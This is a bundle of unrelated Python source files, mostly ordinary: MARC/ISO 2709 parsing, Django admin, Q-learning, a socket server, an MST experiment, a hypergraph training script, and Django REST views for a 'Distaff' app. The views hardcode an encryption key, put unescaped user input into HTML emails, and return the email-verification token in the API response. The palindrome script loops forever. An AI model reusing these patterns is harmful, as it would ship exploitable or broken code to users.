while record[directory] != FIELD_DELIMITER:
# если нарвались на разделитель, значит, справочник закончился
tag = parse_int(record[directory:directory + 3])
field_length = parse_int(record[directory + 3:directory + 7])
field_offset = parse_int(record[directory + 7:directory + 12]) + \
base_address
field = Field(tag)
result.fields.append(field)
if tag < 10:
# фиксированное поле
# не может содержать подполей и индикаторов
field.value = record[field_offset:field_offset +
field_length - 1].decode(charset)
else:
# поле переменной длины
# содержит два однобайтных индикатора
# может содержать подполя
start = field_offset + indicator_length
stop = field_offset + field_length - indicator_length + 1
position = start
# ищем значение поля до первого разделителя
while position < stop:
if record[start] == SUBFIELD_DELIMITER:
break
position += 1
# если есть текст до первого раздлителя, запоминаем его
if position != start:
field.value = record[start:position].decode(charset)
# просматриваем подполя
start = position
while start < stop:
position = start + 1
while position < stop:
if record[position] == SUBFIELD_DELIMITER:
break
position += 1
subfield = SubField(chr(record[start + 1]),
record[start + 2:position].decode(charset))
field.subfields.append(subfield)
start = position
# переходим к следующему полю в справочнике
directory += 12
return result
def write_iso_record(stream, record: Record, encoding: str) -> None:
"""
Сохранение записи в файл в формате ISO 2709.
:param stream: Поток
:param record: Запись
:param encoding: Кодировка
:return: None
"""
record_length = MARKER_LENGTH
dictionary_length = 1 # С учетом ограничителя справочника
field_length: 'List[int]' = []
# Сначала подсчитываем общую длину записи
for field in record.fields:
if field.tag <= 0 or field.tag >= 1000:
# Невозможно закодировать тег поля
raise Exception
dictionary_length += 12 # Одна статья справочника
this_field_length = 0
if field.tag < 10:
# В фиксированном поле не бывает подполей и индикаторов
val = field.value
if val:
this_field_length += len(val.encode(encoding))
else:
this_field_length += 2 # Индикаторы
if field.value:
this_field_length += len(field.value.encode(encoding))
for subfield in field.subfields:
code = subfield.code
if code is None or ord(code) <= 32 or ord(code) >= 255:
raise IrbisError('Bad code: ' + safe_str(code))
this_field_length += 2 # Признак подполя и его код
val = subfield.value
if val:
this_field_length += len(val.encode(encoding))
this_field_length += 1 # Разделитель полей
if this_field_length >= 10_000:
# Слишком длинное поле
raise Exception
field_length.append(this_field_length)
record_length += this_field_length
record_length += dictionary_length # Справочник
record_length += 1 # Разделитель записей
if record_length >= 100_000:
# Слишком длинная запись
raise Exception
# Приступаем к кодированию
dictionary_position = MARKER_LENGTH
base_address = MARKER_LENGTH + dictionary_length
current_address = base_address
buffer = bytearray(record_length)
for i in range(base_address):
buffer[i] = 32 # Заполняем пробелами
encode_int(buffer, 0, 5, record_length)
encode_int(buffer, 12, 5, base_address)
buffer[5] = ord('n') # Record status
buffer[6] = ord('a') # Record type
buffer[7] = ord('m') # Bibliographical index
buffer[8] = ord('2')
buffer[10] = ord('2')
buffer[11] = ord('2')
buffer[17] = ord(' ') # Bibliographical level
buffer[18] = ord('i') # Cataloging rules
buffer[19] = ord(' ') # Related record
buffer[20] = ord('4') # Field length
buffer[21] = ord('5') # Field offset
buffer[22] = ord('0')
# Кодируем конец справочника
buffer[base_address - 1] = FIELD_DELIMITER
# Проходим по полям
for i, field in enumerate(record.fields):
# Кодируем справочник
encode_int(buffer, dictionary_position + 0, 3,
field.tag)
encode_int(buffer, dictionary_position + 3, 4,
field_length[i])
encode_int(buffer, dictionary_position + 7, 5,
current_address - base_address)
# Кодируем поле
if field.tag < 10:
# В фиксированном поле не бывает подполей и индикаторов
encode_str(buffer, current_address, field.value, encoding)
else:
# Два индикатора
buffer[current_address + 0] = 32
buffer[current_address + 1] = 32
current_address += 2
# Значение поля до первого разделителя
current_address = encode_str(buffer, current_address,
field.value, encoding)
# Подполя
for subfield in field.subfields:
buffer[current_address + 0] = SUBFIELD_DELIMITER
buffer[current_address + 1] = ord(subfield.code)
current_address += 2
current_address = encode_str(buffer, current_address,
subfield.value, encoding)
buffer[current_address] = FIELD_DELIMITER
current_address += 1
dictionary_position += 12
# Ограничитель записи
buffer[record_length - 2] = FIELD_DELIMITER
buffer[record_length - 1] = RECORD_DELIMITER
# Собственно записываем
stream.write(buffer)
###############################################################################
__all__ = ['read_text_record', 'read_iso_record', 'STOP_MARKER',
'write_text_record', 'write_iso_record']
|
from django.conf import settings
from django.db import models
from django.contrib.auth.models import User
from models import Video, Note, UserProfile, Source
from django.contrib import admin
class CommonAdmin(admin.ModelAdmin):
actions_on_top = True
actions_on_bottom = True
save_on_top = True
list_filter = ('published',)
class Media:
js = (settings.STATIC_URL+'grappelli/tinymce/jscripts/tiny_mce/tiny_mce.js', settings.STATIC_URL+'js/tinymce_setup.js')
class VideoAdmin(CommonAdmin):
fieldsets = (
('The Basics',
{
'fields': ('title', 'type', 'teaser', 'description', 'user', 'published', 'tags', 'slug',)
}
),
('The Details',
{
'fields': ('video_url', 'video_file', 'time', 'end_time', 'video_length', 'user_name',
'user_link', 'icon', 'icon_link', 'private', 'lock_notes',)
}
),
)
readonly_fields = ('slug',)
list_display = ('title', 'video_url', 'published', 'type', 'private', 'user',)
list_editable= ('published',)
list_display_links = ('title',)
class SourceAdmin(CommonAdmin):
fieldsets = (
('The Basics',
{
'fields': ('name', 'user', 'video', 'url', 'type', 'scraped', 'content',)
}
),
('Twitter Specific',
{
'fields': ('twitter_user', 'twitter_hash', 'twitter_start_id', 'twitter_end_id', 'twitter_search',)
}
),
('CSV Specific',
{
'fields': ('csv_data',)
}
),
('SRT Specific',
{
'fields': ('srt_data',)
}
),
('Oops',
{
'fields': ('error_message',)
}
)
)
list_display = ('name', 'url', 'video', 'creation_time', 'type')
list_display_links = ('name', 'url', 'video', 'creation_time', 'type',)
readonly_fields = ('csv_data', 'srt_data',)
class NoteAdmin(CommonAdmin):
fieldsets = (
('The Basics',
{
'fields': ('text', 'user', 'video', 'published', 'tags', 'private',)
}
),
('The Details',
{
'fields': ('time', 'end_time', 'offset', 'end_offset', 'user_name', 'user_link', 'link', 'icon_link', 'icon', 'type',
'source', 'source_link', 'original_source', 'original_source_link', 'import_source', 'import_source_name',)
}
),
)
list_display = ('text', 'video', 'offset', 'published',)
list_editable= ('published',)
list_display_links = ('text',)
list_filter = ('published', 'private', 'video', 'user', 'import_source', 'type',)
search_fields = ('text',)
readonly_fields = ('import_source_name',)
class UserProfileAdmin(admin.ModelAdmin):
fieldsets = (
('The Basics',
{
'fields': ('user', 'role', 'can_note', 'accepted_eula', )
}
),
)
list_display = ('user', 'role', 'can_note',)
list_editable= ('can_note',)
list_display_links = ('user',)
#admin.site.unregister(User)
#
#class UserProfileInline(admin.TabularInline):
# model = UserProfile
#
#class UserAdmin(admin.ModelAdmin):
# inlines = [UserProfileInline]
#
#admin.site.register(User, UserAdmin)
#select setval('contracts_id_seq', (select max(id) + 1 from contracts));
admin.site.register(Video, VideoAdmin)
admin.site.register(Note, NoteAdmin)
admin.site.register(Source, SourceAdmin)
admin.site.register(UserProfile, UserProfileAdmin) |
from cars import Cars
def load_cars():
cars = []
cars_compact = {100 : {"category": "compact","model": "model1", "mileage": 1000},101 : {"category": "compact","model": "model1", "mileage": 2000},102 : {"category": "compact", "model": "model1", "mileage": 3000},103 : {"category": "compact", "model": "model1", "mileage": 4000}}
cars_premium = {104 : {"category": "premium","model": "model1", "mileage": 1000},105 : {"category": "premium","model": "model1", "mileage": 2000},106 : {"category": "premium", "model": "model1", "mileage": 3000},107 : {"category": "premium", "model": "model1", "mileage": 4000}}
cars_minivan = {108 : {"category": "minivan","model": "model1", "mileage": 1000},109 : {"category": "minivan","model": "model1", "mileage": 2000},110 : {"category": "minivan", "model": "model1", "mileage": 3000},111 : {"category": "minivan", "model": "model1", "mileage": 4000}}
for id,car in cars_compact.items():
mycar = Cars(id,car["category"], car["model"], car["mileage"])
cars.append(mycar)
for id,car in cars_premium.items():
mycar = Cars(id,car["category"], car["model"], car["mileage"])
cars.append(mycar)
for id,car in cars_minivan.items():
mycar = Cars(id,car["category"], car["model"], car["mileage"])
cars.append(mycar)
return cars |
"""
Template for implementing QLearner (c) 2015 Tucker Balch
"""
import numpy as np
import random as rand
class QLearner(object):
def __init__(self, \
num_states=100, \
num_actions = 4, \
alpha = 0.3, \
gamma = 0.9, \
rar = 0.9999999999, \
radr = 0.999999, \
verbose = False):
self.verbose = verbose
self.num_actions = num_actions
self.num_states = num_states
self.alpha = alpha
self.gamma = gamma
self.rar = rar
self.radr = radr
self.Q = {}
def querystate(self, s):
"""
@summary: Update the state without updating the Q-table
@param s: The new state
@returns: The selected action
"""
if s not in self.Q or self._shouldTakeRandomAction():
a = rand.randint(0, self.num_actions - 1)
else:
a = self._bestAction(actions=self.Q[s])
return a
def query(self, s):
if s not in self.Q:
print "Have Not Seen State"
a = rand.randint(0, self.num_actions - 1)
else:
a = self._bestAction(actions=self.Q[s])
return a
def _shouldTakeRandomAction(self):
self.rar = self.rar * self.radr
choice = np.random.choice(2,p=[1-self.rar, self.rar])
return choice
def _bestAction(self, actions):
takeAction = 0
for i in range(len(actions)):
if actions[i] > actions[takeAction]:
takeAction = i
return takeAction
def reward(self, s, a, r):
if s not in self.Q:
self.Q[s] = np.zeros(self.num_actions)
self.Q[s][a] = self._newQValue(s, a, r)
def _newQValue(self, s, a, r):
old_value = (1 - self.alpha) * self.Q[s][a]
new_value = self.alpha * r
return old_value + new_value
def author(self):
return "nlerner3"
|
# -*- coding: utf-8 -*-
import socket
import sys
from thread import *
import newPackage
import re
reload(sys)
sys.setdefaultencoding('utf-8')
HOST = '' # Symbolic name meaning all available interfaces
PORT = 8080 # Port Specified
#Function for handling connections. This will be used to create threads
def clientthread(conn, myPacks):
#infinite loop so that function do not terminate and thread do not end.
while True:
#Receiving from client
try:
data = conn.recv(4096).encode('utf-8')
except:
print "Don't handle non utf-8 chars\n"
break
cmds = data.split("|")
if len(cmds) != 3:
try:
conn.sendall("ERROR\n")
except:
print "Dead connection"
break
continue
cmd = cmds[0].strip()
pkg = cmds[1].strip()
deps = cmds[2].strip()
if cmd == "INDEX":
if not bool(re.match('^[.+a-z0-9_-]+$', pkg, re.IGNORECASE)):
reply = "ERROR\n"
try:
conn.sendall(reply)
except:
print "Dead connection"
break
print data
continue
ret = myPacks.index(pkg, deps)
reply = ret
elif cmd == "REMOVE":
ret = myPacks.remove(pkg)
reply = ret
elif cmd == "QUERY":
ret = myPacks.query(pkg)
reply = ret
elif cmd == "PRINT":
myPacks.printPackage()
reply = "OK\n"
else:
reply = "ERROR\n"
#Now send the response back
try:
conn.sendall(reply)
except:
print "Dead connection"
break
#came out of loop
conn.close()
if __name__=='__main__':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
#Bind socket to local host and port
try:
s.bind((HOST, PORT))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete'
myPacks = newPackage.PackageList()
#Start listening on socket
s.listen(150)
print 'Socket now listening'
#now keep talking with the client
while 1:
#wait to accept a connection - blocking call
conn, addr = s.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
#start new thread takes 1st argument as a function name to be run, second is the tuple of arguments to the function.
start_new_thread(clientthread ,(conn,myPacks,))
s.close()
|
from OpenGL.GL import *
from OpenGL.GLU import *
import transformations as tr
from drawable import Drawable
class Plane( Drawable ) :
def __init__( self , size , m ) :
Drawable.__init__( self )
self.size = map( lambda x : x*.5 , size )
self.m = m
def draw( self ) :
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
glMultTransposeMatrixf(self.m)
self._quad()
glPopMatrix()
def _quad( self ) :
glBegin( GL_QUADS )
glNormal3f(0,1,0)
glVertex3f(-self.size[0],0,-self.size[1])
glVertex3f( self.size[0],0,-self.size[1])
glVertex3f( self.size[0],0, self.size[1])
glVertex3f(-self.size[0],0, self.size[1])
glEnd()
|
'''
UniformlyRandomEdgeMST.py
Created on Feb 18, 2013
@author: adrielklein
This program will use Prim's algorithm to find the weight of a minimum spanning tree of a complete graph
with n vertices, where the weight of each edge is a real number chosen uniformly at random from [0, 1].
'''
from random import uniform #Required to find uniform value in range(0,1)
from HeapOperations import extractMin, changeKey, heapifyUp, heapifyDown
from heapq import heapify
# Creates and an adjacency matrix of n nodes with undirected edges.
# The adjacency matrix has (1/2)n^2 entries to conserve memory. Note that
# this is only possible since edges are undirected. The edge weights are
# chosen uniformly at random in interval (0, 1). The i-th row of the matrix
# represents the edge weight from node i to other nodes in the graph.
def createAdjacencyMatrix(n):
def getRow(i):
newRow = [uniform(0, 1) for j in range(i)]
newRow.append(0.0)
return newRow
adjacencyMatrix = [ getRow(i) for i in range(n)]
return adjacencyMatrix
def minimumSpanningTreeWeight(n):
adjacencyMatrix = createAdjacencyMatrix(n)
# Node 0 will be the root node.
distancesFromRoot = [adjacencyMatrix[i][0] for i in range(n)] #First column of matrix
# Create heap where key is attachmentCost and value is the node.
attachmentCosts = [(distancesFromRoot[i], i) for i in range(n)]
heapify(attachmentCosts)
#Create heapMap that maps each node to its position in heap
heapMap = [None]*n
#Populate heapMap
for i in range(n):
node = attachmentCosts[i][1]
heapMap[node] = i
treeWeight = 0
while len(attachmentCosts) != 0:
pair = extractMin(attachmentCosts, heapMap)
cost = pair[0]
newTreeMember = pair[1]
treeWeight += cost
# Change the keys of all the nodes in the heap that have a new attachment cost
for i in range(n):
if heapMap[i] != -1:
if newTreeMember >= i:
possiblySmallerCost = adjacencyMatrix[newTreeMember][i]
else:
possiblySmallerCost = adjacencyMatrix[i][newTreeMember]
if possiblySmallerCost < attachmentCosts[heapMap[i]][0]:
changeKey(attachmentCosts, heapMap, i, possiblySmallerCost)
return treeWeight
print "Nodes: MST Weight"
#The following loop runs the algorithm for various input lengths and prints the results.
for x in range(4, 14):
weights = [minimumSpanningTreeWeight(2**x) for i in range(5)]
print str(2**x) + ": " + str(sum(weights) / len(weights)) |
"""
Librusec library settings
"""
# -*- coding: utf-8 -*-
LIB_INDEXES = 'D:\\TEMP\\librusec'
LIB_ARCHIVE = 'D:\\lib.rus.ec'
TMP_DIR = 'd:\\temp'
|
print("Enter the number of the lsit one by one\n")
# Take the size of list from the user
size = int(input("Enter size of list\n"))
# Initialize the blank list
mylist = []
# Take the input from the user one by one
for i in range(size):
mylist.append(int(input(f"Enter {i+1} list element\n")))
# mylist = [7, 3, 2, 1]
print(f"Your list is {mylist}\n")
new_list = []
for i in range(len(mylist)):
if mylist[i] <= 10:
new_list.append(mylist[i])
else:
while True:
n = mylist[i] + 1
if str(n) == str(n)[::-1]:
new_list.append(n)
break
print(f"Your New list is {new_list}\n")
|
import argparse
from BatchGenerator import batch_generator
from Classifiers import hgnn
from Classifiers import node2vec
from Classifiers import hyper_sagnn
from DataGenerator import generator
from utils import utils
import networkx as nx
import numpy as np
import scipy.io
import torch
from tqdm import tqdm
np.random.seed(1057)
torch.manual_seed(1057)
parser = argparse.ArgumentParser()
parser.add_argument(
'--dataset', type=str, default='email-enron',
help='Name of the dataset. Possible choices: email-enron, '+
'contact-primary-school, NDC, DBLP, math-sx, contact-high-school, ' +
'MAG-Geo')
parser.add_argument(
'--ratio', type=int, default=5,
help='Number of negative samples for each positive sample in test set')
parser.add_argument(
'--model', type=str, default='HGNN',
help='Model to train: HGNN. HyperSAGNN, Node2Vec')
parser.add_argument(
'--max-epoch', type=int, default=50, help='Number of training epochs')
args = parser.parse_args()
hyperedges, hyperedges_timestamps, hypergraph_nodes = utils.read_benson_dataset(
args.dataset)
hyperedges_to_timestamp = utils.associate_min_timestamp_with_hyperedges(
hyperedges, hyperedges_timestamps)
ground_edges, train_edges, test_edges = generator.get_ground_train_test_split(
args.dataset, hyperedges_to_timestamp, (0.6, 0.8))
hyperedges = {frozenset(hedge) for hedge in hyperedges}
neg_samples_size = args.ratio * len(train_edges)
train_negatives = generator.generate_negative_samples_for_hyperedges(
ground_edges, hyperedges, neg_samples_size)
neg_samples_size = args.ratio * len(test_edges)
test_negatives = generator.generate_negative_samples_for_hyperedges(
ground_edges + train_edges, hyperedges, neg_samples_size)
train_data = train_edges + train_negatives
train_labels = [1 for _ in range(len(train_edges))] + [
0 for _ in range(len(train_negatives))]
test_data = test_edges + test_negatives
test_labels = [1 for _ in range(len(test_edges))] + [
0 for _ in range(len(test_negatives))]
batch_gen = batch_generator.BatchGenerator(
train_data, train_labels, batch_size=64)
test_gen = batch_generator.BatchGenerator(
test_data, test_labels, batch_size=64, test_generator=True)
# Train Data: train_edges, train_negatives
# Test Data: test_edges, test_negatives
# Common: nodes, ground_edges
Htrain = utils.get_hypermatrix(ground_edges, len(hypergraph_nodes))
Htest = utils.get_hypermatrix(ground_edges + train_edges, len(hypergraph_nodes))
max_epoch = args.max_epoch
# Training on top of HGNN model.
if args.model == 'HGNN':
model = hgnn.HGNNHyperlinkPrediction(
len(hypergraph_nodes), 64, aggregate_method='sag-pool',
link_pred_method='addition')
Gtrain = model.generate_laplacian_matrix_from_hypermatrix(Htrain).to(
utils.get_device())
Gtest = model.generate_laplacian_matrix_from_hypermatrix(Htest).to(
utils.get_device())
initial_embeddings = torch.Tensor(np.diag(np.ones(len(hypergraph_nodes))))
initial_embeddings = initial_embeddings.to(utils.get_device())
model = model.to(utils.get_device())
model.trainer(
initial_embeddings, batch_gen, test_gen, Gtrain, Gtest, max_epoch)
elif args.model == 'Node2Vec':
# Training on top of Node2vec model.
Gtrain = (Htrain * Htrain.T).toarray()
Gtest = (Htest * Htest.T).toarray()
train_graph = nx.from_numpy_array(Gtrain)
test_graph = nx.from_numpy_array(Gtest)
model = node2vec.Node2VecHyperlinkPrediction(
train_graph, 64, 40, 10, aggregate_method='sag-pool',
link_pred_method='cosine')
model.learn_node_embeddings(10, 40)
model = model.to(utils.get_device())
model.trainer(batch_gen, test_gen, max_epoch)
elif args.model == 'HyperSAGNN':
# Training Hyper-SAGNN.
Gtrain = (Htrain * Htrain.T).toarray()
Gtest = (Htest * Htest.T).toarray()
train_graph = nx.from_numpy_array(Gtrain)
test_graph = nx.from_numpy_array(Gtest)
model = hyper_sagnn.HyperSAGNN(train_graph, 64, 40, 10, num_heads=4)
model.learn_node_embeddings(10, 40)
model = model.to(utils.get_device())
model.trainer(batch_gen, test_gen, max_epoch)
model.save_report('%s' % (args.dataset))
model.save_best_model(args.dataset)
|
import types
import pytest
from compute_max_sum import compute_max_sum
class TestComputeMaxSum(object):
def test_compute_max_sum_is_a_function(self):
assert isinstance(compute_max_sum, types.FunctionType) == True
def test_compute_max_sum_returns_the_correct_awnser_with_triangle_1(self):
assert compute_max_sum('./data/triangle_1.txt') == 1074
def test_compute_max_sum_returns_the_correct_awnser_with_triangle_2(self):
assert compute_max_sum('./data/triangle_2.txt') == 7273
|
#!/usr/bin/env python
"""
Create the word-pair segments file used for imposing weak top-down constraints.
Run from ../ directory.
Author: Herman Kamper
Contact: kamperh@gmail.com
Date: 2014-2015
"""
import argparse
import datetime
import os
import sys
#-----------------------------------------------------------------------------#
# UTILITY FUNCTIONS #
#-----------------------------------------------------------------------------#
def check_argv():
"""Check the command line arguments."""
parser = argparse.ArgumentParser(description=__doc__.strip().split("\n")[0], add_help=False)
parser.add_argument("clusters_fn", type=str, help="original file list")
parser.add_argument("segments_fn", type=str, help="output segments file")
parser.add_argument("--feats_scp_fn", type=str, help="(default: %(default)s)", default="data/train/feats.scp")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
#-----------------------------------------------------------------------------#
# MAIN FUNCTION #
#-----------------------------------------------------------------------------#
def main():
args = check_argv()
wordpairs_fn = args.clusters_fn
feats_scp_fn = args.feats_scp_fn
segments_fn = args.segments_fn
print datetime.datetime.now()
# Create utterance segments dict
utterance_segs = {} # utterance_segs["sw02001-A_000098-001156"] is (98, 1156)
for line in open(feats_scp_fn):
line = line.split(" ")[0]
utterance_segs[line] = tuple([int(i) for i in line.split("_")[-1].split("-")])
# Create word-pair segments dict
word_segs = {} # word_segs["organized_sw02111-A_000280_000367"] is ("sw02111-A", 280, 367)
for line in open(wordpairs_fn):
# Extract info
word, conversation_1, speaker_id_1, start_1, end_1, conversation_2, speaker_id_2, start_2, end_2 = (
line.split(" ")
)
# Add first word in pair
conversation_1 = "sw0" + conversation_1[:-1] + "-" + conversation_1[-1]
start_1 = int(start_1)
end_1 = int(end_1)
word_id_1 = word + "_" + conversation_1 + "_" + "%06d" % start_1 + "-" + "%06d" % end_1
if word_id_1 not in word_segs:
word_segs[word_id_1] = (conversation_1, start_1, end_1)
# Add second word in pair
conversation_2 = "sw0" + conversation_2[:-1] + "-" + conversation_2[-1]
start_2 = int(start_2)
end_2 = int(end_2)
word_id_2 = word + "_" + conversation_2 + "_" + "%06d" % start_2 + "-" + "%06d" % end_2
if word_id_2 not in word_segs:
word_segs[word_id_2] = (conversation_2, start_2, end_2)
# Write segments file
f = open(segments_fn, "w")
print "Writing segments to: " + segments_fn
i_word = 0
for word_id in word_segs:
conversation, word_start, word_end = word_segs[word_id]
for utt_id in [i for i in utterance_segs.keys() if i.startswith(conversation)]:
utt_start, utt_end = utterance_segs[utt_id]
if word_start > utt_start and word_start < utt_end:
start = word_start - utt_start - 1 # one extra frame at start (i.e. 15 ms overlap of window)
if start < 0:
start = 0
# end = word_end - utt_start - 3 + 1
end = word_end - utt_start - 2 + 1 # also corresponds to a frame with 15 ms overlap
if end > utt_end:
end = utt_end
f.write(word_id + " " + utt_id + " " + str(start) + " " + str(end) + "\n")
i_word += 1
# print "Processed " + str(i_word) + " words."
f.close()
print datetime.datetime.now()
if __name__ == "__main__":
main()
|
from django.shortcuts import render
from rest_framework.decorators import api_view,renderer_classes
from django.views.decorators.csrf import csrf_exempt
from django.db import transaction
from apis.models import *
from apis.serializers import *
from rest_framework.response import Response
from rest_framework import status
from multiprocessing import Lock
from django.http import JsonResponse
from django.core.serializers.json import DjangoJSONEncoder
import json
from django.core.mail import EmailMessage
from commons.constant import *
import traceback
from django.contrib.auth import authenticate, login
from rest_framework.authtoken.models import Token
from django.contrib.auth.models import Group
import base64
from django.db.models import F
import os
from django.db.models import Q
import uuid
from pyfcm import FCMNotification
from django.db import connection
from django.conf import settings
from django.core.files.storage import default_storage
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.contrib.auth.tokens import default_token_generator
import base64, random, pytz
from django.contrib.auth.hashers import make_password
import datetime
from django.core.files.storage import FileSystemStorage
from pytz import timezone
from django.utils import timezone
from django.core.paginator import Paginator
from apis.models import VerifyLog as VerifyLogModel
import stripe
from django.http import JsonResponse
from apis.decorators import AppVersion_required
from django.urls import reverse
import math
from django.db.models import Value
from django.db.models.query import QuerySet
from django.db.models import Avg, Max, Min, Sum, Count
import cryptography
from cryptography.fernet import Fernet
key = b'T8JAUX6QZCl8LFoLuoTJVWUqW8odTZN8ha6a4t0nbg0='
cipher_suite = Fernet(key)
#=======================================
#subscriber on NewsLetter
#========================================
@csrf_exempt
@api_view(['POST'])
def SubScribe(request):
try:
with transaction.atomic():
#received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
try:
user = Subscribe.objects.get(email = request.data['email'])
return Response({"message" : errorSubEmailExist, "status" : "0"}, status=status.HTTP_409_CONFLICT)
except:
subuser = Subscribe.objects.create(email = request.data['email'])
return Response({"message" : addSubSuccessMessage,"status" : "1"}, status=status.HTTP_201_CREATED)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===============================
#Reach Us Distaff
#================================
@api_view(['POST'])
def ReachUsEmail(request):
try:
with transaction.atomic():
# received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
name = request.data['name']
phone = request.data['phone']
email = request.data['email']
subject = request.data['subject']
message = request.data['message']
email_body = """\
<html>
<head>Dear</head>
<body>
<h2>%s</h2>
<p>%s</p>
<p> This email was sent from: </p>
<h5>%s</h5>
<h5>email:%s</h5>
</body>
</html>
""" % (subject, message,name, email)
email = EmailMessage('Contact Us Mail ! ', email_body, to=['sam.costich@distaff.app'])
email.content_subtype = "html" # this is the crucial part
response = email.send()
if response:
contact = ReachUs.objects.create( name = name,
phone = phone,
email = request.data['email'],
subject = subject,
message = message,
)
if contact is not None:
return Response({"status": "1", 'message': 'Query submitted successfully.'}, status=status.HTTP_200_OK)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===========================
#Sign Up
#=============================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def SignUp(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
try:
user = User.objects.get(email = received_json_data['email'])
return Response({"message" : errorEmailExist, "status" : "0"}, status=status.HTTP_201_CREATED)
except:
authuser = User.objects.create(email = received_json_data['email'],
phone = received_json_data['phone'],
username = received_json_data['email'],
password = make_password(received_json_data['password']),
deviceId = received_json_data['deviceId'],
deviceType = received_json_data['deviceType'])
g = Group.objects.get(name='User')
g.user_set.add(authuser)
if authuser:
userobj = User.objects.get(id=authuser.id)
b64UserId = urlsafe_base64_encode(str(userobj.id).encode('utf-8'))
myUserToken = default_token_generator.make_token(userobj)
# nowTime = timezone.now().replace(tzinfo=None).replace(microsecond=0)
nowTime = datetime.datetime.now().replace(tzinfo=None).replace(microsecond=0)
VerifyLogModel.objects.create(id=uuid.uuid4(),
user_id=authuser.id,
code=myUserToken,
created_time = nowTime)
projectUrl = request.build_absolute_uri('/')[:]
verifyLinkUrl = projectUrl + "verifymail?uid=" + b64UserId + "&token=" + myUserToken
list = []
list.append(request.data['email'])
try:
subject = "Verification Mail"
email_body = """\
<html>
<head></head>
<body>
<h2>Dear Distaff User, </h2>
<p> To initiate the verification process,
Please click the link below:</p>
<p> %s </p>
<p>If clicking the link above doesn't work, please copy and paste the URL in a new browser
window instead.</p>
<p>Sincerely, </p>
<p>Distaff Team
</p>
</body>
</html>
""" %(verifyLinkUrl)
email = EmailMessage('Email Verification Mail! ', email_body, to=list)
email.content_subtype = "html"
response = email.send()
except Exception as e:
pass
return Response(
{"message": "A verification link has been sent to your email account"},status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def verifymail(request):
receivedUid = request.GET['token']
b64UserId = request.GET['uid']
b64UserDId = urlsafe_base64_decode(b64UserId)
userobj1 = User.objects.get(id=b64UserDId)
try:
codeExist = VerifyLogModel.objects.filter(code=receivedUid).filter(user_id=userobj1.id).latest('created_time')
except:
codeExist = None
if codeExist is not None and codeExist.codeUsed == 0:
VerifyLogModel.objects.filter(user_id=userobj1.id).update(codeUsed = 1)
User.objects.filter(id = userobj1.id).update(is_email_verified = 1)
return render(request,"passwordReset/VerifyEmaildone.html")
else:
print(traceback.format_exc())
return render(request,"passwordReset/VerifyEmailnotdone.html")
#================================================
# UPDATE DEVICE ID
#================================================
@AppVersion_required
@api_view(['POST'])
def UpdateDeviceId(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
device_Id = received_json_data['deviceId']
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
checkGroup = user.groups.filter(name='User').exists()
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if device_Id is not None:
User.objects.filter(id = user.id).update(deviceId = device_Id)
return Response({"message" : "DeviceId has been changed"}, status=status.HTTP_200_OK)
else:
return Response({"message" : "DeviceId is null"}, status=status.HTTP_200_OK)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==================================================
#send verify link
# ==================================================
@AppVersion_required
@api_view(['POST'])
def SendVerifyLink(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
emailExist = User.objects.get(email = received_json_data['email'])
except Exception as e:
return Response ({"message": "This email does not exist", "status": "0"},status=status.HTTP_404_NOT_FOUND)
if emailExist:
userobj = User.objects.get(id=emailExist.id)
b64UserId = urlsafe_base64_encode(str(userobj.id).encode('utf-8'))
myUserToken = default_token_generator.make_token(userobj)
nowTime = datetime.datetime.now().replace(tzinfo=None).replace(microsecond=0)
ForgetPasswordLog.objects.create(id=uuid.uuid4(),
user_id=emailExist.id,
code=myUserToken,
createdTime= nowTime
)
projectUrl = request.build_absolute_uri('/')[:]
verifyLinkUrl = projectUrl + "validateuser?uid=" + b64UserId + "&token=" + myUserToken
list = []
list.append(request.data['email'])
try:
subject = "Verification Mail"
email_body = """\
<html>
<head></head>
<body>
<h2>Dear %s, </h2>
<p> To initiate the verification process,
Please click the link below:</p>
<p> %s </p>
<p>If clicking the link above doesn't work, please copy and paste the URL in a new browser
window instead.</p>
<p>Sincerely, </p>
<p>Distaff Team
</p>
</body>
</html>
""" %(emailExist.fullname, verifyLinkUrl)
email = EmailMessage('Email Verification Mail! ', email_body, to=list)
email.content_subtype = "html"
response = email.send()
except Exception as e:
pass
return Response(
{"message": "An email has been sent to verify your email", "status": "1", "url": verifyLinkUrl},status=status.HTTP_200_OK)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# ===============================================
# method for verify email
# ===============================================
def validateuser(request):
receivedUid = request.GET['token']
b64UserId = request.GET['uid']
b64UserDId = urlsafe_base64_decode(b64UserId)
userobj1 = User.objects.get(id=b64UserDId)
try:
codeExist = ForgetPasswordLog.objects.filter(code=receivedUid).filter(user_id=userobj1.id).latest('createdTime')
except:
codeExist = None
